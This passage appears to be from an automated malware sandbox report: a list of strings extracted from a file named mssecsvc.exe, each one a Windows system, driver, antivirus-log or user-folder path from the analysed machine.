              Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ru_PTC
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\BrSerId.sys
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\Logs\SystemRestore
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\crcdisk.sys?
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sys;
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\mskssrv.sys
              Source: mssecsvc.exe.2.drBinary string: D\Device\HarddiskVolume2\Windows\System32\drivers\en-US\ipnat.sys.muip
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xmlp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\storvsc.sys,
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasRip-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SystemRestore-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\desktop.inip
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky009.catp
              Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netrass.inf_loc0D
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\amdk8.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-MiscRedirection-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\msdmo.dllF75p
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\dmvsc.sys@
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\umrdp.dllSTRP
              Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exeST
              Source: mssecsvc.exe.2.drBinary string: -\Device\HarddiskVolume2\Windows\inf\mshdc.PNFp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep004.catp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep005.cat
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\1394ohci.sysp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SimpleTCP-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\DFDWiz.exeU0IS$
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep004.cat\
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\ndiscap.PNF
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IE-Troubleshooters-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\intelide.sys
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\TsUsbGD.sys
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\shredlog.cfgp
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\partmgr.sys.mui
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F94FD5F2AAEFDB64257601230509A4E9H
              Source: mssecsvc.exe.2.drBinary string: Y\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc007.catp
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\httpapi.dllpp
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\ListSvc.dll
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\hidbth.sysH
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\arcsas.sysX
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netpacer.inf_locDa
              Source: mssecsvc.exe.2.drBinary string: U\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\Icon Files\2c07d841-785f-469b-81db-3ff900796688.png\
              Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft
              Source: mssecsvc.exe.2.drBinary string: Z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
              Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\SCPD
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\AppIDp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\drmkaud.sysCP
              Source: mssecsvc.exe.2.drBinary string: #\Device\HarddiskVolume3\
              Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\Performance
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\drmkaud.sys
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\ehome\ehprivjob.exe
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMI-SNMP-Provider-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catW
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\csllog.cfgLL
              Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\keyboard.PNF
              Source: mssecsvc.exe.2.drBinary string: m\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\Myp
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\wbem\WmiApSrv.exe
              Source: mssecsvc.exe.2.drBinary string: o\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\windows-legacy-whql.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx004.catp
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\wbem\WmiApSrv.exes\S
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem4.CATWp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnhp004.catWp
              Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\desktop.inip
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exep
              Source: mssecsvc.exe.2.drBinary string: -\Device\HarddiskVolume2\Windows\inf\input.PNFp
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\sisraid2.sys
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sysH
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Program Files\AVG Web TuneUp\TBAPI.dllM
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\hdaudbus.inf_loc
              Source: mssecsvc.exe.2.drBinary string: P\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\battery.inf_loc
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netsstpt.inf_locBFFRp
              Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ru1
              Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: {\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sys1
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\ProgramData\Microsoft\RAC\StateData
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catore.p
              Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\UAGP35.SYS.mui
              Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\en_CPU
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\input.inf_locH
              Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
              Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\ProgramData\Avg\log
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\rdpwd.sys
              Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\ndiscap.inf_loctform.
              Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Remote Access Hoste`
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\ipnat.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\Icon Files\2c07d841-785f-469b-81db-3ff900796688.png
              Source: mssecsvc.exe.2.drBinary string: 9\Device\HarddiskVolume2\Windows\System32\drivers\mpio.sys
              Source: mssecsvc.exe.2.drBinary string: ~\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\Icon Files'*
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cpu.inf_locCC
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sys
              Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex,
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ndiscap.sysS,
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00d.catp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: ^\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows
              Source: mssecsvc.exe.2.drBinary string: v\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\WinSATAPI.dllp
              Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\History\desktop.ini:
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-LocalPrinting-Home-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\nslog.cfgS
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\lltdio.inf_loc
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\acpi.inf_loc
              Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\Temp\_avast_p
              Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\netsstpt.PNFwnp
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows Defender
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sys9
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\sdiagnhost.exe
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\WUDFRd.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume2\Windows\System32\config\systemprofile\Favorites\desktop.ini
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr009.cat1p
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\publog.cfgk
              Source: mssecsvc.exe.2.drBinary string: V\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chkH
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\udhisapi.dll
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\HdAudio.sys.muip
              Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cdrom.inf_loc
              Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\drivers\smb.sysH
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\schedlog.cfgp
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\MSMPEG2ENC.DLLp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adpahci.sysp
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avg_us.lngp
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\ndisuio.PNFT`
              Source: mssecsvc.exe.2.drBinary string: j\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgidpagent.log.1
              Source: mssecsvc.exe.2.drBinary string: q\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Contentp
              Source: mssecsvc.exe.2.drBinary string: m\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep003.cat
              Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001H
              Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avg_ru.lng>"
              Source: mssecsvc.exe.2.drBinary string: .\Device\HarddiskVolume2\Windows\inf\wfplwf.PNF
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\Performance\WinSAT
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\nfrd960.sys
              Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cdrom.inf_locp
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\bthmodem.sys
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\fdPHost.dll
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Program Files\AVG\UiDll\2623
              Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.236.gthr
              Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002H
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ws2ifsl.sys
              Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00w.cat
              Source: mssecsvc.exe.2.drBinary string: p\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost8P
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\megasas.sysPD
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\blbdrive.inf_loc
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\blbdrive.inf_locH
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc00c.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vsmraid.sysp
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\rasmans.dll
              Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs1
              Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Windows Error ReportingPU
              Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\Temp\avg_a04392p
              Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibilityum
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00b.cat
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\msdtc.exe}SDTL
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\mrxdav.sys
              Source: mssecsvc.exe.2.drBinary string: a\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntexe.catp
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\aelupsvc.dll
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx00d.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.ciT
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasCMAK-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534111~31bf3856ad364e35~x86~~6.1.1.0.cat
              Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\tssecsrv.sys
              Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Windows\System32\Speech\SpeechUX\sapi.cpl
              Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\/
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vms3cap.sysST
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\wacompen.sysp
              Source: mssecsvc.exe.2.drBinary string: f\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\History68E:
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\tdtcp.sys
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\msdtckrm.dll
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\amdsata.sys
              Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000H
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Users\Public\Documents\desktop.ini
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\HpSAMD.sys F
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\bxvbdx.sys
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnts003.cat
              Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CTLsp
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\auditcse.dll
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\scfilter.sys.mui
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\tbssvc.dllSTE
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnlx002.catp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\usb.inf_locp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYSH
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catH
              Source: mssecsvc.exe.2.drBinary string: `\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntph.cat
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\lltdio.inf_locp
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\DriverStore\en-USC
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.inip
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\advpack.dll
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\ncobjapi.dllp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Sensors-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\history.xml
              Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\ProgramData\Avg\AV\Chjw\avgpsi.db-journal
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sysh
              Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\sqlceqp30.dll
